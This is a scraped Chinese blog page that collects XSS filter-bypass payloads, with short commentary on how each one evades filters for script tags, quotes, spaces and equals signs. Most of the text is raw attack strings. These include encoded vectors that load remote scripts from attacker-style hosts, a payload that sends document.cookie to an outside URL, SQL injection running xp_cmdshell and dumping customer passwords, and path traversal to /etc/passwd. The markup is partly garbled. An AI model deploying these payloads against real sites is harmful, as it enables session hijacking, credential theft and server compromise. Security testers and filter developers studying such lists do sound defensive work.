温馨提示！由于新浪微博认证机制调整，您的新浪微博帐号绑定已过期，请重新绑定！&&|&&
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
"&&img src="" onerror="document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))"& &在网页过滤了&script和单引号的情况下可以使用代码绕过,上面write中内容输出的结果是&script&alert(1)&/script& & 如果想缩短，可以把上面的参数合并，像这样：String.fromCharCode(76,90,83,66);"&&meta http-equiv="Refresh" content="0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))& 遇到过滤&script&无法调用js的时候也可以用类似的代码突破，上面代码是跳转url到javascript:document.write("&script src=xxx&&/script&") 也就是调用js文件xxx 如果想缩短，可以把上面的参数合并，像这样：String.fromCharCode(76,90,83,66);"&&iframe src=javascript:alert(document.cookie); height=0 width=0 /& &&iframe&弹窗&iframe src=javascript:with(document)0[body.appendChild(document.createElement('script')).src="http://url.cn/1.js"]&&/iframe& iframe收信&&img src=x onerror=appendChild(createElement('script')).src='//js地址' /& img标签来收信&img/**/src=1/**/onerror="with(document)body.appendChild(createElement('script')).src='脚本地址'" /& & 过滤了 &script&标签 以及空格 的解决办法&img src="5" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")&&/img& &回显是&img src="5" onerror=eval("alert('xss')")&&/img& &&如果你要加载脚本请这样：javascript:document.write(unescape(' &script src="脚本地址"&&/script&')); 修改好后 进行HEX加密再放入eval&注：第一段代码：首先将要执行的 利用Hex 编码 再img 的错误事件 用eval 函数 操控()内的代码！eval 可以计算 并执行 将上面代码解码后便执行了！&第二段加载脚本的：首先是利用 javascript unescape函数 对()内的HEX编码进行解码 然后再通过document.write 在文档对象上面输入()内的内容！&因为()内的内容以及经过unescape的解码 所以输出来后是正常的 如果没有进行解码 那么你输出来的 将会是hex&在这里没有出现 script等危险标签 也没有单引号 所以成功绕过！ & &过滤了单引号 以及几个危险标签&script&document.write(String.fromCharCode(在这里写上你的代码));&/script& & 过滤了等号 单引号 双引号 空格的绕过方法&img src=1 onerror=&#106&#x61v&#x61scri&#x70&#116:&#97&#108&#x65rt(&#34\x58S\x53\40\x41t\x74\x61\x63\153e\162&#34)& &该过滤的都过滤了&img src=x onerror=alert(/insight-labs/)&、&p onmouseover=alert(/insight-labs/)&insight-labs、&frameset onload=alert(/insight-labs/)&、&body onload=alert(/insight-labs/)& & 事件函数 来弹窗屏蔽了scaript可以把scaript改成sc%0aript来绕过"h"+"t"+"t"+"p"，绕过对http的过滤'"&&script&alert(/1/)&/script&&a="'"&&script src=http://x.co/xiHv&&/script&&a="='&&script&alert(document.cookie)&/script&&script&alert(document.cookie)&/script&&script&alert(vulnerable)&/script&%3Cscript%3Ealert('XSS')%3C/script%3E'"&&script src="//x.co/xiHv"&&/script&&a="'"&&script src=//xss.tw/2045&&/script&&a="'"&&script src=//xss.tw/3058&&/script&&a="&&script&src=//xss.tw/3058&&/script&& &引号& &空格& & &&& & &&无src 无等号 &无引号"&&/span&&script&document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,46,99,111,47,120,105,72,118,62,60,47,115,99,114,105,112,116,62));&/script&&span&eval(Dec('203','2549'));&div style="display:none"&&/div&&div style="display:none" &t="1" &e="style\/&'&&&/div&&/ \&&/&img src=# onerror=eval(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,120,115,115,46,116,119,47,51,48,53,56,62,60,47,115,99,114,105,112,116,62,32));/\&gt&&div id="myxsxxcd" style="color:display:none" title="if(!window.myxsssxx){window.myxsssxx=123;alert(document.cookie);}"&&DIV&&A&&/A&&STYLE&&!--a{& img src=&/STYLE&;x:expression(eval(myxsxxcd.title));&style&}--&&/style&&/DIV&&td width="628" background="/img/index2_r7_c2_r1_c5_s1_s1.jpg"&&img src=x onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,119,47,51,51,56,49,34))&&&img src=x onerror=eval(String.fromCharCode(document.body.appendChild(createElement("script")).src="http://xss.tw/3381"))&&img src=x onerror=document.body.appendChild(createElement('script')).src="javascript:alert(/1/)"&&&img src=x onerror=document.body.appendChild(createElement('script')).src='http://xss8.net/?
c=QihaL'&&p&&img class="reference" contenteditable="false" data-refid="2" data-type="reference" onerror="eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))" src="http://img.baidu.com/img/baike/editor/reference.gif" unselectable="on" /&&/p&eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))&div class="qm_left" style="position:z-index:2;background:url(//xss.tw/2180) no-repeat 0 0;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='//xss.tw/2180',sizingMethod='scale');width:40height:40"&&span class="qm_ico_print" id="mail_print" title="打印" onclick="window.open('/cgi-bin/readmail?sid=SC_hEOi3h_nqEgJQ&amp');"&&/span&ECMAScript v3 已从标准中删除了 unescape() 函数，并反对使用它因此应该用 decodeURI() 和 decodeURIComponent() 取而代之。通过找到形式为 %xx 和 %uxxxx 的字符序列（x 表示十六进制的数字）用 Unicode 字符 \u00xx 和 \uxxxx 替换这样的字符序列进行解码。解密是unescape('%udcdb%uced3%u8d93%u888a%ud58f%u');加密是escape('%udcdb%uced3%u8d93%u888a%ud58f%ud4c8%udcd9%ud ');&javascript:document.write(unescape('&script src="http://www.xxxx.com/x.js"&&/script&'));document.write(String.fromCharCode(60,12,62)); &==== &document.write(String.fromCharCode(&script src=http://xss.me/1&&/script&));&"&&/span&&script&document.write(http://baidu.com)&/script&&span&[email][url][img]http://xxx.com onmouseover=eval(String.fromCharCode(116,114)); [/img][/url][/email]鼠标单击&a href="http://www.xyydyt.com" style="color:#143d70;" onclick="alert(/a/);this.style.behavior='url(#default#homepage)';this.setHomePage('http://www.xyydyt.com'); return(false);"&asdasdsad&/a&&table background=”javascript:alert(/xss/)”&&/table&’/在表格中插入脚本&&过滤用\x3cscript. src=http://www.2cto.com /malicious-code.js\x3e\x3c/script\x3e&&script defer="defer"&var a,b;a="/";b="/x.co/xiHv";window.open(a+b,"","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=500,height=500");&/script&&% string str_a = rrequest.getParameter("a");%&&var a= &%=str_a%&document.write(a);&img src="123"&a.jsp/&script&alert('Vulnerable')&/script&a/a?&script&alert('Vulnerable')&/script&"&&script>alert('xss')</script&';exec%20master..xp_cmdshell%20'dir%20 c:%20&%20c:\inetpub\wwwroot\?.txt'--&&%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cscript%3Ealert(document. domain);%3C/script%3E&%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=../../../../../../../../etc/passwd..\..\..\..\..\..\..\..\windows\system.ini\..\..\..\..\..\..\..\..\windows\system.ini'';!--"&XSS&=&{()}&IMG src="javascript:alert('XSS');"&&IMG src=javascript:alert('XSS')&&IMG src=JaVaScRiPt:alert('XSS')&&IMG src=JaVaScRiPt:alert("XSS")&&IMG src=javascript:alert('XSS')&&IMG src=javascript:alert('XSS')&&IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&&&sRCIpt&alert(/123/)&/ScRpT&&P&&SPAN class=xmsw title=防火外墙保温材料 onmouseout="window.location='http://www.xfydyt.com'"&了解你的产品和行&/SPAN&&/P&&div style="background-image:url(&script&alert(document.cookie)&/script&)"&&div style="background-image:url(javascript:alert(document.cookie))"&&div style="behaviour:url('http://www.how-to-hack.org/exploit.html');"&&div style="width:expression(alert('x123ss'));"&&img src="java&#script:alert(/1231/);"&&img src=javａｓcript:alert(/1231/);&&img src="javascript:alert('XSS')"&&IMG src="jav ascript:alert('XaSS');"&&IMG src="jav ascript:alert('XbSS');"&&IMG src="jav ascript:alert('XcSS');"&"&IMG src=java\0script:alert(\"XSS\")&";' & out&IMG src=" javascript:alert('XdSS');"&&SCRIPT&a=/XSfS/alert(a.source)&/SCRIPT&&BODY BACKGROUND="javascript:alert('XeSS')"&&BODY ONLOAD=alert('XgSS')&&IMG DYNSRC="javascript:alert('XhSS')"&&IMG LOWSRC="javascript:alert('XiSS')"&&BGSOUND src="javascript:alert('XjSS');"&&span onclick="javascript:changeFont(2);"&&SPAN class=xmsw title=dd onmouseout=window.location='http://www,xfydyt.com'&test&/span&&span class="xmsw" title="dd" onmouseout=window.location='http://test/test.php?c='+document.cookie&test&/span&&SPAN class=xmsw title=dd onmouseout=javascript:alert(document.cookie)&test&/SPAN&&br size="&{alert('XkSS')}"&&LAYER src="http://xss.ha.ckers.org/a.js"&&/layer&&LINK REL="stylesheet" href="javascript:alert('XlSS');"&&IMG src='vbscript:msgbox("XmSS")'&&IMG src="mocha:[code]"&&IMG src="livescript:[code]"&&META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XoSS');"&&IFR & &AME src=javascript:alert('XSnS')&&/IFRA & &ME&&FRAMESET&&FRAME src=javascript:alert('XpSS')&&/FRAME&&/FRAMESET&&TABLE BACKGROUND="javascript:alert('XSqS')"&&DIV STYLE="background-image: url(javascript:alert('X1SS'))"&&DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"&&DIV STYLE="width: expression(alert('X2SS'));"&&STYLE&@im\port'\ja\vasc\ript:alert("X3SS")';&/STYLE&&IMG STYLE='xss:expre\ssion(alert("X5SS"))'&&STYLE TYPE="text/javascript"&alert('X4SS');&/STYLE&&STYLE TYPE="text/css"&.XSS{background-image:url("javascript:alert('X6SS')");}&/STYLE&&A CLASS=XSS&&/A&&STYLE type="text/css"&BODY{background:url("javascript:alert('X7SS')")}&/STYLE&&BASE href="javascript:alert('X8SS');//"&getURL("javascript:alert('X9SS')")a="get";b="URL";c="javascript:";d="alert('X10SS');";eval(a+b+c+d);&XML src="javascript:alert('X11SS');"&"& &BODY ONLOAD="a();"&&SCRIPT&function a(){alert('X12SS');}&/SCRIPT&&"&SCRIPT src="http://xss.ha.ckers.org/xss.jpg"&&/SCRIPT&&IMG src="javascript:alert('X13SS')"&!--#exec cmd="/bin/echo '&SCRIPT SRC'"--&&!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js&&/SCRIPT&'"--&&IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"&&SCRIPT a="&" src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&SCRIPT ="&" src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&SCRIPT a="&" '' src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&SCRIPT "a='&'" src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&SCRIPT&document.write("&SCRI");&/SCRIPT&PT src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&A href=http://www.gohttp://www.google.com/ogle.com/&link&/A&&DIV STYLE="width:expression(alert('anyunix'));"&&IMG SRC='vbscript:msgbox("anyunix")'&&STYLE&width:expression(alert('anyunix'));&/STYLE&(1)普通的XSS JavaScript注入&SCRIPT SRC=http://3w.org/XSS/xss.js&&/SCRIPT&(2)IMG标签XSS使用JavaScript命令&SCRIPT SRC=http://3w.org/XSS/xss.js&&/SCRIPT&(3)IMG标签无分号无引号&IMG SRC=javascript:alert('XSS')&(4)IMG标签大小写不敏感&IMG SRC=JaVaScRiPt:alert('XSS')&(5)HTML编码(必须有分号)&IMG SRC=javascript:alert("XSS")&(6)修正缺陷IMG标签&IMG """&&SCRIPT&alert("XSS")&/SCRIPT&"&(7)formCharCode标签(计算器)&IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&(8)UTF-8的Unicode编码(计算器)&IMG SRC=jav..省略..S')&(9)7位的UTF-8的Unicode编码是没有分号的(计算器)&IMG SRC=jav..省略..S')&(10)十六进制编码也是没有分号(计算器)&IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29&(11)嵌入式标签,将Javascript分开&IMG SRC="jav ascript:alert('XSS');"&(12)嵌入式编码标签,将Javascript分开&IMG SRC="jav ascript:alert('XSS');"&(13)嵌入式换行符&IMG SRC="jav ascript:alert('XSS');"&(14)嵌入式回车&IMG SRC="jav ascript:alert('XSS');"&(15)嵌入式多行注入JavaScript,这是XSS极端的例子&IMG SRC="javascript:alert('XSS')"&(16)解决限制字符(要求同页面)&script&z='document.'&/script&&script&z=z+'write("'&/script&&script&z=z+'&script'&/script&&script&z=z+' src=ht'&/script&&script&z=z+'tp://ww'&/script&&script&z=z+'w.shell'&/script&&script&z=z+'.net/1.'&/script&&script&z=z+'js&&/sc'&/script&&script&z=z+'ript&")'&/script&&script&eval_r(z)&/script&(17)空字符perl -e 'print "&IMG SRC=java\0script:alert(\"XSS\")&";' & out(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用perl -e 'print "&SCR\0IPT&alert(\"XSS\")&/SCR\0IPT&";' & out(19)Spaces和meta前的IMG标签&IMG SRC=" javascript:alert('XSS');"&(20)Non-alpha-non-digit XSS&SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"&&/SCRIPT&(21)Non-alpha-non-digit XSS to 2&BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")&(22)Non-alpha-non-digit XSS to 3&SCRIPT/SRC="http://3w.org/XSS/xss.js"&&/SCRIPT&(23)双开括号&&SCRIPT&alert("XSS");//&&/SCRIPT&(24)无结束脚本标记(仅火狐等浏览器)&SCRIPT SRC=http://3w.org/XSS/xss.js?&B&(25)无结束脚本标记2&SCRIPT SRC=//3w.org/XSS/xss.js&(26)半开的HTML/JavaScript XSS&IMG SRC="javascript:alert('XSS')"(27)双开角括号&iframe src=http://3w.org/XSS.html &(28)无单引号 双引号 分号&SCRIPT&a=/XSS/alert(a.source)&/SCRIPT&(29)换码过滤的JavaScript\";alert('XSS');//(30)结束Title标签&/TITLE&&SCRIPT&alert("XSS");&/SCRIPT&(31)Input Image&INPUT SRC="javascript:alert('XSS');"&(32)BODY Image&BODY BACKGROUND="javascript:alert('XSS')"&(33)BODY标签&BODY('XSS')&(34)IMG Dynsrc&IMG DYNSRC="javascript:alert('XSS')"&(35)IMG Lowsrc&IMG LOWSRC="javascript:alert('XSS')"&(36)BGSOUND&BGSOUND SRC="javascript:alert('XSS');"&(37)STYLE sheet&LINK REL="stylesheet" HREF="javascript:alert('XSS');"&(38)远程样式表&LINK REL="stylesheet" HREF="http://3w.org/xss.css"&(39)List-style-image(列表式)&STYLE&li {list-style-image: url("javascript:alert('XSS')");}&/STYLE&&UL&&LI&XSS(40)IMG VBscript&IMG SRC='vbscript:msgbox("XSS")'&&/STYLE&&UL&&LI&XSS(41)META链接url&META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"&(42)Iframe&IFRAME SRC="javascript:alert('XSS');"&&/IFRAME&(43)Frame&FRAMESET&&FRAME SRC="javascript:alert('XSS');"&&/FRAMESET&(44)Table&TABLE BACKGROUND="javascript:alert('XSS')"&(45)TD&TABLE&&TD BACKGROUND="javascript:alert('XSS')"&(46)DIV background-image&DIV STYLE="background-image: url(javascript:alert('XSS'))"&(47)DIV background-image后加上额外字符(1-32&34&39&160&&)&DIV STYLE="background-image: url( javascript:alert('XSS'))"&(48)DIV expression&DIV STYLE="width: expression_r(alert('XSS'));"&(49)STYLE属性分拆表达&IMG STYLE="xss:expression_r(alert('XSS'))"&(50)匿名STYLE(组成:开角号和一个字母开头)&XSS STYLE="xss:expression_r(alert('XSS'))"&(51)STYLE background-image&STYLE&.XSS{background-image:url("javascript:alert('XSS')");}&/STYLE&&A CLASS=XSS&&/A&(52)IMG STYLE方式exppression(alert("XSS"))'&(53)STYLE background&STYLE&&STYLE type="text/css"&BODY{background:url("javascript:alert('XSS')")}&/STYLE&(54)BASE&BASE HREF="javascript:alert('XSS');//"&(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS&EMBED SRC="http://3w.org/XSS/xss.swf" &&/EMBED&(56)在flash中使用ActionScrpt可以混进你XSS的代码a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval_r(a+b+c+d);(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上&HTML xmlns:xss&&?import namespace="xss" implementation="http://3w.org/XSS/xss.htc"&&xss:xss&XSS&/xss:xss&&/HTML&(58)如果过滤了你的JS你可以在图片里添加JS代码来利用&SCRIPT SRC=""&&/SCRIPT&(59)IMG嵌入式命令,可执行任意命令&IMG SRC="http://www.XXX.com/a.php?a=b"&(60)IMG嵌入式命令(a.jpg在同服务器)Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser(61)绕符号过滤&SCRIPT a="&" SRC="http://3w.org/xss.js"&&/SCRIPT&(62)&SCRIPT ="&" SRC="http://3w.org/xss.js"&&/SCRIPT&(63)&SCRIPT a="&" " SRC="http://3w.org/xss.js"&&/SCRIPT&(64)&SCRIPT "a='&'" SRC="http://3w.org/xss.js"&&/SCRIPT&(65)&SCRIPT a=`&` SRC="http://3w.org/xss.js"&&/SCRIPT&(66)&SCRIPT a="&'&" SRC="http://3w.org/xss.js"&&/SCRIPT&(67)&SCRIPT&document.write("&SCRI");&/SCRIPT&PT SRC="http://3w.org/xss.js"&&/SCRIPT&(68)URL绕行&A HREF="http://127.0.0.1/"&XSS&/A&(69)URL编码&A HREF="http://3w.org"&XSS&/A&(70)IP十进制&A HREF="http://″&XSS&/A&(71)IP十六进制&A HREF="http://0xc0.0xa8.0×00.0×01″&XSS&/A&(72)IP八进制&A HREF="http://00.0001″&XSS&/A&(73)混合编码&A HREF="htt p://6 6.×7.147/""&XSS&/A&(74)节省[http:]&A HREF="//www.google.com/"&XSS&/A&(75)节省[www]&A HREF="http://google.com/"&XSS&/A&(76)绝对点绝对DNS&A HREF="http://www.google.com./"&XSS&/A&(77)javascript链接&A HREF="javascript:document.location='http://www.google.com/'"&XSS&/A&Code: &INPUT TYPE="IMAGE" SRC="javascript:alert(XSS);"&Code: &BODY BACKGROUND="javascript:alert(XSS)"&Code: &BODY ONLOAD=alert(XSS)&Code: &IMG DYNSRC="javascript:alert(XSS)"&Code: &BGSOUND SRC="javascript:alert(XSS);"&Code: &BR SIZE="&{alert(XSS)}"& &(netspace)Code: &LINK REL="stylesheet" HREF="javascript:alert(XSS);"&Code: &LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"&Code: &STYLE&@importhttp://ha.ckers.org/xss.&/STYLE&Code: &META HTTP-EQUIV="Link" Content="&http://ha.ckers.org/xss.css&; REL=stylesheet"&Code: &STYLE&BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}&/STYLE&Code: &XSS STYLE="behavior: url(xss.htc);"&Code: &STYLE&li {list-style-image: url("javascript:alert(XSS)");}&/STYLE&&UL&&LI&XSSCode: &IMG SRC="mocha:[code]"& (netscape only)Code: &IMG SRC="livescript:[code]"& (netscape only)Code: &TABLE BACKGROUND="javascript:alert(XSS)"&Code: &IFRAME SRC="javascript:alert(XSS);"&&/IFRAME&Code: &TABLE&&TD BACKGROUND="javascript:alert(XSS)"&Code: &DIV STYLE="background-image: url(javascript:alert(XSS))"&Code: &BASE HREF="javascript:alert(XSS);//"&&US_ASCII编码（库尔特发现）。使用7位ascii编码代替8位，可以绕过很多过滤。但是必须服务器是以US-ASCII编码交互的。目前仅发现Apache Tomcat是以该方式交互。Code: ?scriptualert(EXSSE)?/scriptu&META协议Code:&META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(XSS);"&Code: &META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"&Code: &META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(XSS);"&&对DIV进行unicode编码Code: &DIV STYLE="background-image: 075 072 06C 028 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.3 053 027 029 029"&&使用expression属性Code: &DIV STYLE="width: expression(alert(XSS));"&&STYLE标签Code:&STYLE&@importjavasc ipt:alert("XSS");&/STYLE&Code: &STYLE TYPE="text/javascript"&alert(XSS);&/STYLE&Code: &STYLE&.XSS{background-image:url("javascript:alert(XSS)");}&/STYLE&&A CLASS=XSS&&/A&Code: &STYLE type="text/css"&BODY{background:url("javascript:alert(XSS)")}&/STYLE&&OBJECT标签Code: &OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"&&/OBJECT&Code: &OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-&&param name=url value=javascript:alert(XSS)&&/OBJECT&&EMBED标签Code: &EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"&&/EMBED&Code: &EMBED SRC="data:image/svg+base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"&&/EMBED&在flash文件中使用如下代码：Code: a="get";b="URL("";c="javascript:";d="alert(XSS);")";eval(a+b+c+d);&XML namespace可以引入行为文件htc但是必须在同一服务器上Code: &HTML xmlns:xss&& &?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"&& &xss:xss&XSS&/xss:xss&&/HTML&Xss.htc: &PUBLIC:COMPONENT TAGNAME="xss"&& &&PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/&&/PUBLIC:COMPONENT&&SCRIPT&& &function main()& &{& & &alert("XSS");& &}&/SCRIPT&&使用CDATA模糊化的XML数据岛Cdoe: &XML ID=I&&X&&C&&![CDATA[&IMG SRC="javas]]&&![CDATA[cript:alert(XSS);"&]]&&/C&&/X&&/xml&&SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&&/SPAN&&XML数据岛Code：&XML ID="xss"&&I&&B&&IMG SRC="javas&!-- --&cript:alert(XSS）
阅读(1625)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
loftPermalink:'',
id:'fks_',
blogTitle:'xss各种绕过收集',
blogAbstract:'&a href=\"javascrip:alert(document.cookie)\"& 用a标签来弹窗\"&&img src=\"\" onerror=\"document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(10',
blogTag:'',
blogUrl:'blog/static/',
isPublished:1,
istop:false,
modifyTime:9,
publishTime:8,
permalink:'blog/static/',
commentCount:0,
mainCommentCount:0,
recommendCount:0,
bsrk:-100,
publisherId:0,
recomBlogHome:false,
currentRecomBlog:false,
attachmentsFileIds:[],
groupInfo:{},
friendstatus:'none',
followstatus:'unFollow',
pubSucc:'',
visitorProvince:'',
visitorCity:'',
visitorNewUser:false,
postAddInfo:{},
mset:'000',
remindgoodnightblog:false,
isBlackVisitor:false,
isShowYodaoAd:false,
hostIntro:'',
hmcon:'0',
selfRecomBlogCount:'0',
lofter_single:''
{list a as x}
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人：
{list a as x}
{if !!b&&b.length>0}
他们还推荐了：
{list b as y}
转载记录：
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}